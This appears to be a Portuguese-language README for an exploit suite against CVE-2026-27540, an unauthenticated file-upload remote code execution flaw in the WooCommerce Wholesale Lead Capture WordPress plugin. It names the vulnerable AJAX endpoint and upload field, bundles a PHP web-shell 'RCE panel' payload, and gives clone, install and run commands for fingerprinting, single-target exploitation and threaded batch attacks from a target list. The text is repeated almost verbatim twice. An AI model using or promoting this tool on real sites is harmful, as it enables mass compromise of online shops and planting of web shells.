Suíte de exploits em Python para CVE-2026-27540, um RCE de upload de arquivo não autenticado no plugin WooCommerce Wholesale Lead Capture, com fingerprinting, direcionamento em lote e um payload de painel RCE.
WooCommerce Wholesale Lead Capture (WWLC) — Upload de arquivo sem autenticação → RCE
| Produto | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Versão | ≤ 2.0.3.1 |
| Corrigido | 2.0.3.2+ — handler de upload protegido |
| Auth | Não autenticado |
| Vetor | admin-ajax.php?action=wwlc_file_upload_handler |
| Campo | file (upload multipart) |
| Gravado em | Diretório de uploads do WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Arquivo | Função |
|---|---|
winrarzips_brand.py | Banner do CMD (by winrarzips) |
wwlc_core.py | Motor do exploit |
CVE-2026-27540-Suite.py | CLI em lote + alvo único |
payloads/x7-panel.php | Painel RCE |
requirements.txt | Dependências |
❌ Lista de alvos, resultados de scan e URLs de painéis não estão no repositório.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — Upload de arquivo sem autenticação → RCE
| Produto | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Afetado | ≤ 2.0.3.1 |
| Corrigido | 2.0.3.2+ — handler de upload reforçado |
| Auth | Não autenticado |
| Vetor | admin-ajax.php?action=wwlc_file_upload_handler |
| Campo | file (upload multipart) |
| Caminho de gravação | Diretório de uploads do WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Arquivo | Função |
|---|---|
winrarzips_brand.py | Banner do CMD (by winrarzips) |
wwlc_core.py | Núcleo do exploit |
CVE-2026-27540-Suite.py | CLI em lote + alvo único |
payloads/x7-panel.php | Payload do painel RCE |
requirements.txt | Dependências |
❌ Listas de alvos, resultados de scan e URLs de painéis ativos não estão incluídos.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed